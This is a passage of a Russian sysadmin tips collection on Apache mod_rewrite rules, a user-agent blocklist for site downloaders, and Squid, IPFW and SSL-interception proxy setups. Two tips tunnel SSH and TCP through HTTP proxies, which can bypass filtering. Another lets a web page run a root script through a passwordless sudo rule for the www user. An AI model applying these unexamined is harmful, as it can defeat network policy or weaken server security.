[F,L] Дополнительный список: RewriteCond %{HTTP_USER_AGENT} Accelerator [OR] RewriteCond %{HTTP_USER_AGENT} Ants [OR] RewriteCond %{HTTP_USER_AGENT} attach [OR] RewriteCond %{HTTP_USER_AGENT} BackWeb [OR] RewriteCond %{HTTP_USER_AGENT} Teleport.*Pro [OR] RewriteCond %{HTTP_USER_AGENT} Bandit [OR] RewriteCond %{HTTP_USER_AGENT} Buddy [OR] RewriteCond %{HTTP_USER_AGENT} Collector [OR] RewriteCond %{HTTP_USER_AGENT} Copier [OR] RewriteCond %{HTTP_USER_AGENT} Downloader [OR] RewriteCond %{HTTP_USER_AGENT} Drip [OR] RewriteCond %{HTTP_USER_AGENT} eCatch [OR] RewriteCond %{HTTP_USER_AGENT} EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} FileHound [OR] RewriteCond %{HTTP_USER_AGENT} FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} GetRight [OR] RewriteCond %{HTTP_USER_AGENT} Gets [OR] RewriteCond %{HTTP_USER_AGENT} Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} gotit [OR] RewriteCond %{HTTP_USER_AGENT} Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} GoZilla [OR] RewriteCond %{HTTP_USER_AGENT} Grabber [OR] RewriteCond %{HTTP_USER_AGENT} GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} Grab.*Site [OR] RewriteCond %{HTTP_USER_AGENT} Grafula [OR] RewriteCond %{HTTP_USER_AGENT} Gulliver [OR] RewriteCond %{HTTP_USER_AGENT} HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [OR] RewriteCond %{HTTP_USER_AGENT} IBrowse [OR] RewriteCond %{HTTP_USER_AGENT} InterGET [OR] RewriteCond %{HTTP_USER_AGENT} Internet.*Ninja [OR] RewriteCond %{HTTP_USER_AGENT} Iria [OR] RewriteCond %{HTTP_USER_AGENT} jetcar [NC,OR] RewriteCond %{HTTP_USER_AGENT} JOC [OR] RewriteCond %{HTTP_USER_AGENT} JustView [OR] RewriteCond %{HTTP_USER_AGENT} leach [OR] RewriteCond %{HTTP_USER_AGENT} leech [OR] RewriteCond %{HTTP_USER_AGENT} lftp [OR] RewriteCond %{HTTP_USER_AGENT} likse [NC,OR] RewriteCond %{HTTP_USER_AGENT} Magnet [OR] RewriteCond %{HTTP_USER_AGENT} Mag-Net [OR] RewriteCond %{HTTP_USER_AGENT} Memo [OR] RewriteCond %{HTTP_USER_AGENT} MIDown.*tool [OR] RewriteCond %{HTTP_USER_AGENT} Mirror [OR] RewriteCond %{HTTP_USER_AGENT} Mister.*PiX [OR] RewriteCond %{HTTP_USER_AGENT} Navroad [OR] RewriteCond %{HTTP_USER_AGENT} NearSite [OR] RewriteCond %{HTTP_USER_AGENT} Net.*Reaper [OR] RewriteCond %{HTTP_USER_AGENT} NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} Net.*Vampire [OR] RewriteCond %{HTTP_USER_AGENT} NetZip [OR] RewriteCond %{HTTP_USER_AGENT} Ninja [OR] RewriteCond %{HTTP_USER_AGENT} Octopus [OR] RewriteCond %{HTTP_USER_AGENT} Offline.*Explorer [OR] RewriteCond %{HTTP_USER_AGENT} Offline [OR] RewriteCond %{HTTP_USER_AGENT} PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} Page.*Saver [OR] RewriteCond %{HTTP_USER_AGENT} Papa.*Foto [OR] RewriteCond %{HTTP_USER_AGENT} pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} Pita [OR] RewriteCond %{HTTP_USER_AGENT} Pockey [OR] RewriteCond %{HTTP_USER_AGENT} Pump [OR] RewriteCond %{HTTP_USER_AGENT} Reaper [OR] RewriteCond %{HTTP_USER_AGENT} Recorder [OR] RewriteCond %{HTTP_USER_AGENT} ReGet [OR] RewriteCond %{HTTP_USER_AGENT} Siphon [OR] RewriteCond %{HTTP_USER_AGENT} SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} Snagger [OR] RewriteCond %{HTTP_USER_AGENT} Snake [OR] RewriteCond %{HTTP_USER_AGENT} Stripper [OR] RewriteCond %{HTTP_USER_AGENT} Sucker [OR] RewriteCond %{HTTP_USER_AGENT} SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} Triton [OR] RewriteCond %{HTTP_USER_AGENT} Vacuum [OR] RewriteCond %{HTTP_USER_AGENT} Weazel [OR] RewriteCond %{HTTP_USER_AGENT} WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} WebCapture [OR] RewriteCond %{HTTP_USER_AGENT} WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} Web.*Image.*Collector [OR] RewriteCond %{HTTP_USER_AGENT} WebMirror [OR] RewriteCond %{HTTP_USER_AGENT} WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} WebRecorder [OR] RewriteCond %{HTTP_USER_AGENT} WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} WebSite.*Extractor [OR] RewriteCond %{HTTP_USER_AGENT} Website.*Quester [OR] RewriteCond %{HTTP_USER_AGENT} Web.*Spy [OR] RewriteCond %{HTTP_USER_AGENT} WebSpy [OR] RewriteCond %{HTTP_USER_AGENT} Webster [OR] RewriteCond %{HTTP_USER_AGENT} WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} Web.*Sucker [OR] RewriteCond %{HTTP_USER_AGENT} WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} Whacker [OR] RewriteCond %{HTTP_USER_AGENT} Widow [OR] RewriteCond %{HTTP_USER_AGENT} SpaceBison [OR] RewriteCond %{HTTP_USER_AGENT} www\.asona\.org RewriteRule .* - [F,L]

Как в Apache использовать скрипт для обработки части пути (доп. ссылка 1) Автор: Rodriges [обсудить]

Есть скрипт http://domain.ru/art, для того чтобы запрос http://domain.ru/art/something не вызывал ошибки и приводил к запуску этого скрипта в настройках Apache 2 нужно прописать: <FilesMatch "^art"> AcceptPathInfo On </Files> Для Apache 1.3, можно воспользоваться ErrorDocument 404 /cgi-bin/art.cgi Или <Location /art> SetHandler cgi-script </Location> Или RewriteEngine on RewriteRule ^/art/(.*)$ /home/user/cgi-bin/art.cgi?$1 [T=application/x-httpd-cgi,L]

Как более эффективно блокировать несколько IP в apache (доп. ссылка 1) [комментарии]

При наличии IP в blacklist.txt, посетителю показывается sorry.html: RewriteEngine on Rewritemap ipmap txt:/path/to/blacklist.txt RewriteCond ${ipmap:%{REMOTE_ADDR}} =b RewriteCond %{request_uri} !=/sorry.html RewriteCond %{request_uri} !=/stylesheet.css RewriteRule .* /sorry.html [R,L] /path/to/blacklist.txt 11.22.33.44 b 22.33.44.55 b 33.44.55.66 b

Пример mod_rewrite редиректа при условии наличия файла [обсудить]

Существует множество файлов вида http://www.host.ru/test/dirN/M.html и http://www.host.ru/test/dirN/new/M.html (N=1,2..., M=1,2..) Необходимо, если установлена cookie shownew=on и присутствует файл /test/dirN/new/M.html прозрачно отображать его содержимое, а не файла /test/dirN/M.html, который показываем если /test/dirN/new/M.html отсутствует. RewriteEngine on RewriteCond %{HTTP_COOKIE} ^.*shownew=on.*$ RewriteCond %{REQUEST_URI} ^/test/([a-z]+[0-9]+)/([0-9]+\.html)$ RewriteCond /home/host/htdocs/test/%1/new/%2 -f RewriteRule ^/test/([a-z]+[0-9]+)/([0-9]+\.html)$ /home/host/htdocs/test/$1/new/$2 [L]

Как в mod_rewrite организовать прозрачный переброс на CGI скрипт [обсудить]

Вместо test.shtml?parm=N выдаем результат работы /cgi-bin/test.cgi?param=1 RewriteCond %{REQUEST_URI} /test.shtml RewriteCond %{QUERY_STRING} param=[0-9]+ RewriteRule ^(.+) $1/%{QUERY_STRING} [C] RewriteRule ^/test.shtml/param=([0-9]+) /home/user/cgi-bin/test.cgi?param=$1 [T=application/x-httpd-cgi,L]

Можно ли произвести редирект на другую страницу без использования mod_rewrite [комментарии]

Можно воспользоваться директивой Redirect из mod_alias: Redirect /dir1 http://test.ru/dir2 Redirect permanent /dir1/ http://test.ru/dir2 RedirectMatch ^/$ http://test.ru/new.html RedirectMatch .* http://test.ru/new.html RedirectMatch (.*)\.gif$ http://test.ru$1.jpg AliasMatch ^/img/(.*) /home/user1/img/$1

Как разрешить скачивать картинки с текущего сайта и запретить выкачивание через чужие линки. Автор: uldus [комментарии]

RewriteEngine On RewriteCond %{REQUEST_URI} /img/ RewriteCond %{HTTP_REFERER} !^.*somedom\.ru.* [NC] RewriteCond %{HTTP_REFERER} !^$ RewriteRule .* /empty.gif [L]

Выдача страницы в Apache в зависимости от языка Автор: Belousov Oleg [комментарии]

есть диры: sub_host1/ru sub_host1/en sub_host2/ru sub_host2/en при обращении к www.somehost.ru/sub_host1 (и 2) должнен быть переход в дир со своим языком. -- cgi-bin/redir.pl -- #!/usr/bin/perl use CGI qw/:standard/; ($lang) = $ENV{HTTP_ACCEPT_LANGUAGE} =~ /(.?.?)/; ($redirurl) = param('redirurl'); $lang='en' if !( -d $ENV{DOCUMENT_ROOT}.$redirurl.$lang); print redirect(-url=>$redirurl.$lang.'/'); -- httpd.conf -- RewriteEngine On RewriteRule ^(/sub_host1/)$ /cgi-bin/redir.pl?redirurl=$1 [R,NE] RewriteRule ^(/sub_host2/)$ /cgi-bin/redir.pl?redirurl=$1 [R,NE] </VirtualHost>

Как организовать прозрачный редирект на другую страницу [комментарии]

redirect /catalog http://new_host/new_catalog или с mod_rewrite: RewriteCond %{HTTP_HOST} ^www.host1.ru$ [NC] RewriteRule (.*) http://www.host2.ru:8200$1 [R=permanent,L]

Прокси сервер Squid

ACL, ограничения трафика и пользователей

Как узнать логин в домене Windows имея ip и NTLM авторизацию в Squid? Автор: Забудкин Лев Мирославович [комментарии]

Если у Вас есть SQUID и Вы используете NTLM авторизацию и хотите знать какой сейчас (по крайней мере в последний раз авторизовался) у клиента IP адрес или какому клиенту он присвоен, то воспользуйтесь следующей командой: awk '{user[tolower($8)]=$3} END {for(i in user) {print user[i] " " i}}' access.log | sort Будет выведено примерно следующее: 192.168.132.200 e_scher 192.168.132.202 v_lit 192.168.132.203 a_volob 192.168.132.204 a_kuch 192.168.132.210 e_utsum 192.168.132.211 v_nik 192.168.132.212 s_maz Как видите, это удобно использовать в случае squid и NAT.

Прокси сервер Squid c E2guardian и Clamav Автор: Анкх [комментарии]

Тема достаточно избитая, но у E2Guardian - форка Dansguardian, появились новые возможности, и теперь эту связку можно настроить несколько красивее. Сразу скажу что в плане SSL трафика все стало намного лучше. Теория. Прокси сервер Squid хорошо работает в режиме SSL bump, раскрывая SSL соединение и получая доступ к его содержимому. Далее он может это содержимое отдать на проверку ICAP серверу по протоколу icap://. Еще раз поясним, что в этот момент контент уже не шифрован, а plain. Раньше использовали сервер C-icap с бэкендами (как правило с одним только Clamav или другим AV) для дальнейшего сканирования. Для сканирования контента на фразы по icap:// не было бесплатной реализации, а Dansguardian использовался как каскадный Proxy, и не имел доступа к SSL содержимому (или я ошибаюсь, поправьте меня). Dansguardian заброшен с 2012 года, но нашлись люди, который сделали форк под наименованием E2guardian. В него добавили функциональность работы в режиме ICAP сервера. То есть теперь на текущий момент Squid может отдавать раскрытый SSL трафик прямо в E2guardian по протоколу icap://. E2guardian в свою очередь может сканировать трафик по фразам, а также он унаследовал возможность отдавать его на проверку в Clamav на вирусы. Получается достаточно красивая связка Squid =icap://=> E2guardian => Clamav. Сборка. Я собираю все в Slackware64-current (просто у меня дома сейчас так). Сборка не интересна, слакваристы сами умеют это делать, и отнимает много времени. Кому все таки надо, вот мой build. Итак мы получили 3 пакета: squid-4.6-x86_64-2.txz clamav-0.101.2-x86_64-2.txz e2guardian-5.3-x86_64-2 Я установил их в chroot /opt/SEC-server и установил туда окружение с нужными зависимостями. Настройку описывать не буду, потому что это совет, а не инструкция. Предлагаю скачать готовый 64-битный chroot, он не замусорит систему. Необходимо сгенерить и установить ключ с сертификатом и установить в etc/squid, а также поправить etc/resolv.conf и etc/hosts. Сертификат устанавливается также на каждую рабочую станцию в корневые центры сертификации. Тесты. Тесты на вирусы: https://www.eicar.org/?page_id=3950. Проверяем и SSL и Plain ссылки. Тест на большой файл с вирусом: bigfile Тест на фразы Google: анонимные прокси

Скрипт генерации статистики для Free-SA Автор: Linjan [комментарии]

Анализатор логов Squid Free-SA (http://free-sa.sourceforge.net/) значительно удобнее и быстрее SARG. Во FreeBSD его можно установить из портов (/usr/ports/www/free-sa/). Настраивается программа достаточно тривиально, достаточно использовать поставляемый в комплекте (после установки порта находится в /usr/local/etc/free-sa/) пример free-sa.conf.sample, поменяв там путь к логам Squid в директиве "log_file". Через файл usertab (путь задается директивой username_file) можно определить псевдонимы для замены IP адресов именами пользователей, например, указав "192.168.0.1 Директор". При необходимости меняем путь к директории для сохранения сгенерированных отчетов (target_directory) и директории для сохранения временного кэша данных из лога Squid (директива cache_directory). Базовые параметры можно переопределить вручную, запустив из командной строки: free-sa -d 20.09.2010-21.09.2010 -l путь_к_логу_squid -o директория_для_сохранения_отчетов Ниже представлен скрипт для генерации статистики по заданным интервалам: #!/bin/bash # Modification for free-sa # Idea: ## SARG - Daily/Weekly/Monthly Squid usage reports creation tool ## Written by Ugo Viti <ugo.viti@initzero.it> ## Thanks for enanchements to: ## - martijn ## - Stas Degteff https://sourceforge.net/users/stas_degteff/ # Modification by Linjan <tank1992@gmail.com> FREESA="/usr/local/bin/free-sa" CONFIG="/usr/local/etc/free-sa/free-sa.conf" TMPFILE=`/bin/mktemp` ERRORS="${TMPFILE}.errors" # Date Calc MANUALDATE=$2 case "$(uname)" in "FreeBSD") TODAY=$(date +%m/%d/%Y) YESTERDAY=$(date -v-1d +%m/%d/%Y) WEEKAGO=$(date -v-1w +%m/%d/%Y) MONTHAGO=$(date -v-1m +%m/01/%Y)-$(date -v-1m +%m/31/%Y) ;; *) TODAY=$(date --date "today" +%m/%d/%Y) YESTERDAY=$(date --date "1 day ago" +%m/%d/%Y) WEEKAGO=$(date --date "1 week ago" +%m/%d/%Y) MONTHAGO=$(date --date "1 month ago" +%m/01/%Y) ;; esac manual () { if [ -z "$MANUALDATE" ] then echo "No date given, please specify a valid date (MM/DD/YYYY)" else $FREESA -f $CONFIG -d $MANUALDATE-$MANUALDATE fi } today () { $FREESA -f $CONFIG -d $TODAY-$TODAY >$ERRORS 2>&1 } daily () { $FREESA -f $CONFIG -d $YESTERDAY-$YESTERDAY >$ERRORS 2>&1 } weekly () { $FREESA -f $CONFIG -d $WEEKAGO-$YESTERDAY >$ERRORS 2>&1 } monthly () { $FREESA -f $CONFIG -d $MONTHAGO-$YESTERDAY >$ERRORS 2>&1 } case $1 in manual) manual ;; today) today ;; daily) daily ;; weekly) weekly ;; monthly) monthly ;; *) echo "Usage: $0 [OPTIONS]" echo echo "Allowed options:" echo " manual, Create Manual report" echo " date format is MM/DD/YY" echo " today, Create Today report" echo " daily, Create Daily report" echo " weekly, Create Weekly report" echo " monthly, Create Monthly report" exit 0 esac Помещаем данный скрипт в директорию, откуда будем его запускать, присваиваем права запуска и добавляем эти строки в crontab: 00 00 * * * freesa-reports daily 00 01 * * 1 freesa-reports weekly 30 02 1 * * freesa-reports monthly

Защищаем http-proxy от пробрасывания http-туннеля средствами iptables (доп. ссылка 1) Автор: Владимир [комментарии]

При пробрасывании http-туннеля через http-прокси, http-заголовок пакета имеет аномально маленький размер, порядка 80-90 байт, так как передается лишь минимальный набор данных. Заголовок передаваемых браузером запросов обычно не бывает меньше 350 байт. Основываясь на данной особенности можно отфильтровать проброшенных поверх http-прокси туннели. # политика по умолчанию iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP # создаём новую цепочку LENGTH iptables -N LENGTH # проверяем длину пакета, если меньше 350 байт то блокируем iptables -A LENGTH -p tcp --dport 3128 -m length --length :350 -j DROP # если пакет больше 350 байт то пропускаем iptables -A LENGTH -p tcp --dport 3128 -j ACCEPT # разрешаем подключение на порт 3128 iptables -A INPUT -p tcp --syn --dport 3128 -j ACCEPT # в установленом соединении проверяем пакеты на запрос GET --hex- string "|47 45 54 20|" # если есть такой пакет то направляем его в цепочку LENGTH для проверки длины пакета iptables -A INPUT -p tcp --dport 3128 -m state --state ESTABLISHED -m string --algo kmp \ --hex-string "|47 45 54 20|" --from 52 --to 56 -j LENGTH iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p all -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT Представленный пример опробован на httptunnel

Организация подключения по SSH через HTTP прокси [комментарии]

Устанавливаем ПО corkscrew (http://www.agroman.net/corkscrew/), позволяющее создавать туннели поверх HTTP прокси. Например, для Debian/Ubuntu: apt-get install corkscrew Для FreeBSD: cd /usr/ports/net/corkscrew && make && make install Создаем в домашней директории файл настроек .proxy-auth в который прописываем логин и пароль для подключения к прокси, в формате "имя:пароль", например: moi_login:moi_parol Настраиваем проброс туннеля в SSH. В ~/.ssh/config добавляем: Host * ProxyCommand corkscrew хост_прокси_сервера порт_прокси_сервера %h %p ~/.proxy-auth Вместо %h и %p ssh подставит хост и порт удаленной машины Подключаемся к внешнему хосту стандартно: ssh testhost.ru

Помещение данных о входящем трафике из ipcad в лог squid (доп. ссылка 1) Автор: Забудкин Лев Мирославович [комментарии]

Чтобы анализаторы логов прокси сервера squid отображали данные о пересылках в обход прокси, например данные по почтовому или ssh трафику, можно сохранить данные о таких пересылках в логе squid. Настройки ipcad: capture-ports enable; interface ppp* filter "ip and not dst net 192.168.0.0/16"; aggregate 0.0.0.0/0 strip 32; /* Считаем все адреса */ /* Теперь укажем какие порты как отображать */ aggregate 1-19 into 65535; aggregate 20-21 into 21; aggregate 22-23 into 22; aggregate 25 into 25; aggregate 24 into 65535; aggregate 26-79 into 65535; aggregate 80-81 into 0; aggregate 82-109 into 65535; aggregate 110 into 110; aggregate 111-442 into 65535; aggregate 443 into 443; aggregate 444-3127 into 65535; aggregate 3128 into 0; aggregate 3129-65535 into 65535; Сам файл обработки ipcad и записи в сквидовский лог: #!/bin/sh net="192.168" ttime=`/usr/bin/rsh localhost sh ip acco|/bin/grep 'Accounting data saved'| /bin/awk '{print ($4)}'` /usr/bin/rsh localhost clear ip accounting /usr/bin/rsh localhost show ip accounting checkpoint|/bin/grep $net|/bin/awk -v vtime=$ttime '{print (vtime".000",1,$1,"TCP_MISS/200",$4,"CONNECT",$2":"$6,"-","DIRECT/"$2,"-")}' >>/var/log/squid/access.log Вместо 192.168 Вы можете указать свою сеть, которую брать с ipcad'а и заносить в лог прокси сервера Squid. Таким образом весь трафик, указанный в настройках ipcad'а будет отображен в access.log сквида, который в данном примере находится в папке /var/log/squid.

Прозрачное проксирование FreeBSD + IPFW + Squid. Автор: Астафьев Григорий [комментарии]

Все тестировалось на FreeBSD 6.2. Вначале добавляем необходимые опции в ядро: IPFIREWALL IPFIREWALL_FORWARD Далее добавляем правила на разворот трафика на Squid: ipfw add 49 fwd 127.0.0.1,3128 tcp from any to any 80 Затем правка собственно squid.conf : http_port 3128 httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on

Как вытащить все MP3 файлы из кеша Squid Автор: Michael Rulov [комментарии]

purge -n -a -s -c /etc/squid/squid.conf -C /tmp/MP3s/ -e '\.mp3|\.wav' Утилиту purge скачать можно здесь: http://www.wa.apana.org.au/~dean/sources/

WCCP + Linux + Squid Автор: Mike Zagrayevsky [комментарии]

Чтобы заставить эту связку работать необходимо в конфиге squid'a поставить "wccp_version 4", а на cisco - "ip wccp version 1" иначе не работает. Ядро 2.4.x собирается с включенным GRE, потом собирается и подгружается модуль ip_wccp.o Никаких iptunnel руками делать не надо. Все работает и без них.

Аутентификация пользователей в squid через учетные записи samba (доп. ссылка 1) Автор: freeman [обсудить]

1. собрать сквид (2.5s1 или s2) с поддержкой аутентификации --enable-auth=basic,ntlm --enable-auth-modules=SMB --enable-basic-helpers=SMB --enable-ntlm-modules=SMB 2. поставить ntlm_auth из /helpers/ntlm_auth/smb/ 3. поставить smb_auth (для клиентов не поддерживающих ntlm аутентификацию) из /helpers/basic_auth/smb/ 4. в сквиде аутентификацию делать через ACL proxu_auth. basic аутентификацию через smb_auth (см. сайт разработчиков), для ntlm_auth встроенный хелп. Для самбы стандартные настройки для контроллера домена.

Принудительное проксирование в FreeBSD (доп. ссылка 1) Автор: Дмитрий Новиков [комментарии]

Для принудительного проксирования, на прокси-сервере следует ввести правила Firewall: 01000 fwd 127.0.0.1,3128 tcp from 10.128.0.0/16 to any 80,8080,8101 В squid.conf нужно добавить: httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on На маршрутизаторе "развернуть" Веб-трафик на ПРОКСИ-сервер: ipfw add 10 fwd ip_прокси tcp from 10.128.0.0/16 to any 80,8080 out xmit lnc1

Как пробросить туннель через http-прокси (например squid) (доп. ссылка 1) [комментарии]

Сервер: stunnel -p /usr/local/etc/stunnel.pem -r 127.0.0.1:80 -d 443 Клиент: stunnel -c -d 2.2.2.2:2323 -r proxy.host.ru:3128 -Z 3.3.3.3:443 Организуется туннель: user -> 2.2.2.2:2323 -> proxy.host.ru:3128 -> 3.3.3.3:443 -> 127.0.0.1:80 127.0.0.1:80 - ip и порт на удаленной машине, куда пробрасывается туннель. 2.2.2.2:2323 - ip и порт локальной машины, "вход в туннель" proxy.host.ru:3128 - proxy сервер с поддержкой CONNECT 3.3.3.3:443 - удаленная машина, ожидающая сторона туннеля.

Как запустить squid без кэширования страниц и балансировкой трафика. (доп. ссылка 1) [комментарии]

# Запрещаем кэширование acl all src 0/0 no_cache deny all # Пересобираем с поддержкой null хранилища. ./configure --enable-storeio=ufs,null # Включаем поддержку null кэша. cache_dir null /tmp # Балансировка трафика между тремя каналами: acl satalite_link src 192.168.1.0/255.255.255.0 tcp_outgoing_address 192.168.1.1 satalite_link tcp_outgoing_address 192.168.1.2

Как принудительно завернуть весь http трафик через Squid на FreeBSD [комментарии]

В /etc/ipnat.rules заносим: rdr rl0 0/0 port 80 -> 127.0.0.1 port 3128 tcp В squid.conf: httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on

Все работает отлично, за исключением того, что Squid не работает с некоторыми единичными хостами. (доп. ссылка 1) [обсудить]

echo 0 > /proc/sys/net/ipv4/tcp_ecn

Как увеличить производительность squid proxy ? (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Используйте метод доступа к хранилищу DISKD. Параметры сборки: ./configure --enable-storeio=diskd,ufs (также можно указать --enable-async-io --enable-poll) В файле конфигурации: cache_dir diskd /cache1 1024 16 256 Q1=72 Q2=64

ACL, ограничения трафика и пользователей

Привязка IPFW к SAMS Автор: Bani [комментарии]

Долго я искал решение как привязать правила IPFW и Squid к веб-интерфейсу, никак не мог найти готовое и подходящее для себя решение. Поставил SAMS но и он только для Squid. Задумался привязать его к IPFW, вот готовое решение, для таких как я... очень удобно если находишься вне офиса или территориально отдалён. Этот способ не является идеальным, но как вариант очень удобен и не требует больших усилий. Система и компоненты: FreeBSD 8.0/Squid 2.6/SAMS-1.0.5/Rejik/PHP 5.3.14/Apache 2.2/Sudo Как ставить из портов думаю ясно. И так, пишем скрипт и кладём его в /usr/local/etc/rc.d чтобы он запускался автоматом: #! /bin/sh # PROVIDE: ipfwsams . /etc/rc.subr name="ipfwsams" rcvar=`set_rcvar` start_cmd="myscript_start" stop_cmd=":" load_rc_config $name FwCMD="/sbin/ipfw" DATE=`date` myscript_start() { if checkyesno ${rcvar}; then echo > /usr/local/rejik/blocked_ipfw grep -E -o -h '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}' /usr/local/rejik/_sams_banlists/default_denied/urls | tr A-Z a-z | sort | uniq >> /usr/local/rejik/blocked_ipfw echo > /usr/local/rejik/blocked2_ipfw grep -E -o -h '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}' /usr/local/rejik/_sams_banlists/4fb624a388513_denied/urls | tr A-Z a-z | sort | uniq >> /usr/local/rejik/blocked2_ipfw ${FwCMD} table 1 flush ${FwCMD} table 2 flush ${FwCMD} table 3 flush cat /usr/local/rejik/4b8bcc7c015ed.sams | awk '{ if ($1!="") {system("ipfw table 2 add "$1"")} }' > /dev/null cat /usr/local/rejik/4fb624a388513.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null cat /usr/local/rejik/default.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null cat /usr/local/rejik/50336b692ec18.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null cat /usr/local/rejik/blocked_ipfw | awk '{ if ($1!="") {system("ipfw table 3 add "$1"")} }' > /dev/null cat /usr/local/rejik/blocked2_ipfw | awk '{ if ($1!="") {system("ipfw table 3 add "$1"")} }' > /dev/null echo "$DATE: IPFW to SAMS STARTED" >> /var/log/samslog fi } run_rc_command "$1" Данный скрипт будет выделять нужные IP из списков Rejik-а и помещать их в таблицы IPFW (далее поясню как он работает). Для того чтобы скрипт запускался автоматом при старте системы прописываем строчку в rc.config: ipfwsams_enable="YES" Для запуска данного скрипта через веб-интерфейс нужно создать PHP файл, я расположил его в корне самса (/usr/local/share/sams/ipfwrestart.php): <?php exec ('/usr/local/share/sams/src/script/restart_ipfw'); print(" <center><b>IPFW RESTARTED</b> "); $str= file_get_contents("/var/log/samslog"); $str = nl2br($str, true); $str = nl2br($str, false); echo $str; print("</center>"); ?> Теперь пропишем ссылку на этот файл в Самсе, редактируем файл /usr/local/share/sams/src/squidbuttom_0_reconfig.php Ищем строчку: $str="<FONT color=\\"BLUE\\" SIZE=+1>$squidbuttom_0_reconfig_ReconfigSquid_3\\n"; заменяем на: $str="<FONT color=\\"BLUE\\" SIZE=+1> $squidbuttom_0_reconfig_ReconfigSquid_3<BR><BR><a href=\\"ipfwrestart.php\\">Restart IPFW</a></FONT><BR>\\n"; для проверки лезем в самс > сквид > реконфигурировать, после того как команда отправлена должна вылезти ссылка на рестарт IPFW. файл скрипт рестарта, это по сути команда sudo на старт скрипта от пользоватеоля с правами рута: #! /bin/sh sudo -u root /usr/local/etc/rc.d/ipfwsams start Так как PHP файл запустить Shell скрипт от пользователя www не может используем sudo. Для того чтобы разрешить пользователю www запускать от рута нужно добавить в конфиг sudo строчку (/usr/local/etc/sudoers): www ALL=(ALL) NOPASSWD: /usr/local/etc/rc.d/ipfwsams start нужные строки для IPFW (80 порт завёрнут на squid): allowedports="20,21,53,443,123,4321" (по каким портам натить) ifout='vr0' (внешний) ifuser='ste0' (внутренний) #TABLE1 - обычные пользователи #TABLE2 - ADMINS #TABLE3 - IP адреса к которым нужно заблокировать доступ (только для обычных пользователей) ipfw add divert natd all from "table(2)" to any out via ${ifout} ipfw add deny all from "table(1)" to "table(3)" ipfw add divert natd icmp from "table(1)" to any out via ${ifout} ipfw add divert natd all from "table(1)" to any ${allowedports} out via ${ifout} И так, рассмотрим ранее упомянутый скрипт-граббер IP-адресов: #! /bin/sh # PROVIDE: ipfwsams ... echo > /usr/local/rejik/blocked_ipfw - создаём файл где будем хранить IP адреса из списков запрета SAMS grep -E -o -h '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}' /usr/local/rejik/_sams_banlists/default_denied/urls | tr A-Z a-z | sort | uniq >> /usr/local/rejik/blocked_ipfw - по маске выковыриваем из файла Rejik все IP адреса, которые мы добавили в САМСЕ, в данном случае это первый созданный в самс Запрет доступа по URL. echo > /usr/local/rejik/blocked2_ipfw - создаём файл где будем хранить IP адреса из списков запрета SAMS grep -E -o -h '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}' /usr/local/rejik/_sams_banlists/4fb624a388513_denied/urls | tr A-Z a-z | sort | uniq >> /usr/local/rejik/blocked2_ipfw - по маске выковыриваем из файла Rejik все IP адреса, которые мы добавили в САМСЕ, в данном случае это какой то список имеющий идентификатор "4fb624a388513" в Запрет доступа по URL, его можно определить в таблицах MySql ${FwCMD} table 1 flush - Сбрасываем всё содержимое таблицы ${FwCMD} table 2 flush - Сбрасываем всё содержимое таблицы ${FwCMD} table 3 flush - Сбрасываем всё содержимое таблицы cat /usr/local/rejik/4b8bcc7c015ed.sams | awk '{ if ($1!="") {system("ipfw table 2 add "$1"")} }' > /dev/null - обавляем в таблицу IP адреса шаблона Админов (ID можно найти в MySql) cat /usr/local/rejik/4fb624a388513.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null - Добавляем в таблицу IP адреса входящие в шаблон обычных пользователей (ID можно найти в MySql) cat /usr/local/rejik/50336b692ec18.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null - Добавляем в таблицу IP адреса входящие в шаблон обычных пользователей, второй шаблон (ID можно найти в MySql) cat /usr/local/rejik/default.sams | awk '{ if ($1!="") {system("ipfw table 1 add "$1"")} }' > /dev/null - Добавляем в таблицу IP адреса группы обычных пользователей, у меня 3 шаблона в САМС, разница только в доступе по 80 порту, поэтому всё остальное как у обычных пользователей (ID можно найти в 